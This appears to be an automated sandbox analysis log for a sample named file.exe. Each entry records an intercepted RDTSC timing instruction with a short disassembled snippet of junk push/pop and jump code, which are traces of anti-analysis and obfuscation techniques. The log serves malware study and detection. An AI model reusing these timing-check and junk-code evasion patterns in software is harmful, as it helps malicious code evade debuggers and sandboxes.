Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52AEE5 second address: 52AF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBE451FC076h 0x0000000a popad 0x0000000b jnc 00007FBE451FC07Ch 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 jp 00007FBE451FC076h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push esi 0x0000001f jmp 00007FBE451FC084h 0x00000024 push eax 0x00000025 pop eax 0x00000026 pop esi 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C5B1 second address: 52C5E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FBE44B74B67h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C5E0 second address: 52C5F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBE451FC082h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C5F9 second address: 52C60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007FBE44B74B58h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C60E second address: 52C618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C618 second address: 52C631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 jnc 00007FBE44B74B5Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5306AA second address: 5306B4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBE451FC07Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EDAF5 second address: 4EDB45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FBE44B74B56h 0x00000009 js 00007FBE44B74B56h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dl, bl 0x00000017 sbb di, 3F09h 0x0000001c lea eax, dword ptr [ebp+12481824h] 0x00000022 push eax 0x00000023 jmp 00007FBE44B74B69h 0x00000028 pop edi 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FBE44B74B60h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EDB45 second address: 4EDB4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE01C second address: 4EE027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE195 second address: 4EE19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE19A second address: 4EE1AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE44B74B60h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE1AE second address: 4EE1F6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBE451FC076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jo 00007FBE451FC08Fh 0x00000014 jmp 00007FBE451FC089h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FBE451FC089h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE2AC second address: 4EE2B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FBE44B74B56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE559 second address: 4EE560 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE8DC second address: 4EE8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE8E7 second address: 4EE8EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE8EB second address: 4EE927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D2539h], ecx 0x0000000e and ecx, dword ptr [ebp+122D2A6Fh] 0x00000014 push 0000001Eh 0x00000016 mov dl, 78h 0x00000018 nop 0x00000019 js 00007FBE44B74B5Eh 0x0000001f push edx 0x00000020 jno 00007FBE44B74B56h 0x00000026 pop edx 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FBE44B74B62h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EEC5F second address: 4EECB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007FBE451FC076h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FBE451FC078h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D254Ch], edi 0x0000002f lea eax, dword ptr [ebp+12481868h] 0x00000035 add dword ptr [ebp+12452061h], esi 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e ja 00007FBE451FC07Ch 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EECB2 second address: 4EECBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FBE44B74B56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D33BD second address: 4D33C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D33C1 second address: 4D33D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 js 00007FBE44B74B5Eh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531153 second address: 531157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537023 second address: 537034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBE44B74B56h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537034 second address: 537040 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007FBE451FC076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 537040 second address: 53704A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBE44B74B62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53704A second address: 537050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535B5F second address: 535B67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535B67 second address: 535B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535B6C second address: 535B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535B74 second address: 535B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535B7A second address: 535BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBE44B74B66h 0x0000000e jmp 00007FBE44B74B68h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536423 second address: 536429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536429 second address: 53643A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jc 00007FBE44B74B56h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536A8F second address: 536A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536A93 second address: 536A9B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536A9B second address: 536AAF instructions: 0x00000000 rdtsc 0x00000002 je 00007FBE451FC078h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a je 00007FBE451FC07Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536AAF second address: 536ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FBE44B74B64h 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536EF8 second address: 536EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536EFC second address: 536F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44B74B67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FBE44B74B56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536F21 second address: 536F2B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBE451FC076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539B23 second address: 539B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539B27 second address: 539B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539CA0 second address: 539CAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FBE44B74B56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539CAB second address: 539CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBE451FC088h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007FBE451FC080h 0x00000016 pop eax 0x00000017 jmp 00007FBE451FC07Eh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539F8C second address: 539F90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539F90 second address: 539FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE451FC088h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBE451FC086h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539FC6 second address: 539FCC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C202 second address: 53C206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C375 second address: 53C384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 je 00007FBE44B74B6Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541710 second address: 54171F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FBE451FC076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54171F second address: 541725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541725 second address: 54173D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FBE451FC07Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541B2F second address: 541B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541B33 second address: 541B63 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBE451FC076h 0x00000008 jmp 00007FBE451FC087h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBE451FC07Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541B63 second address: 541B90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FBE44B74B5Ah 0x0000000f js 00007FBE44B74B56h 0x00000015 pop ebx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541B90 second address: 541BB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC086h 0x00000007 jp 00007FBE451FC076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541BB0 second address: 541BD4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FBE44B74B66h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007FBE44B74B56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541BD4 second address: 541BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541D2E second address: 541D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541D34 second address: 541D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FBE451FC086h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541D54 second address: 541D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541D58 second address: 541D68 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBE451FC076h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541D68 second address: 541D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541D6E second address: 541D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007FBE451FC076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 541EDB second address: 541EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FBE44B74B5Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE6F8 second address: 4EE6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE6FC second address: 4EE764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 ja 00007FBE44B74B6Fh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FBE44B74B58h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 pushad 0x0000002a mov bx, 610Bh 0x0000002e movzx esi, di 0x00000031 popad 0x00000032 mov ebx, dword ptr [ebp+12481863h] 0x00000038 add ch, 00000071h 0x0000003b add eax, ebx 0x0000003d mov dword ptr [ebp+122D2523h], edi 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 push ebx 0x00000048 pop ebx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EE764 second address: 4EE768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 542185 second address: 542189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 542B82 second address: 542B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 542B87 second address: 542B9E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBE44B74B5Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FBE44B74B56h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 542B9E second address: 542BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FBE451FC07Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FBE451FC076h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545C68 second address: 545C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545C6C second address: 545C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jc 00007FBE451FC076h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545C7E second address: 545C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54571C second address: 545723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545723 second address: 545749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE44B74B5Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jl 00007FBE44B74B56h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545749 second address: 54574D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54574D second address: 545753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545753 second address: 54576D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBE451FC084h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54576D second address: 54577D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007FBE44B74B56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54577D second address: 545781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5459E8 second address: 5459EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5459EE second address: 5459F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5459F2 second address: 5459F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 549BCA second address: 549BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 549BCE second address: 549BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 549BD7 second address: 549BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 549D56 second address: 549D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 549D5A second address: 549D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 549D64 second address: 549D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 549D68 second address: 549D73 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A00B second address: 54A010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
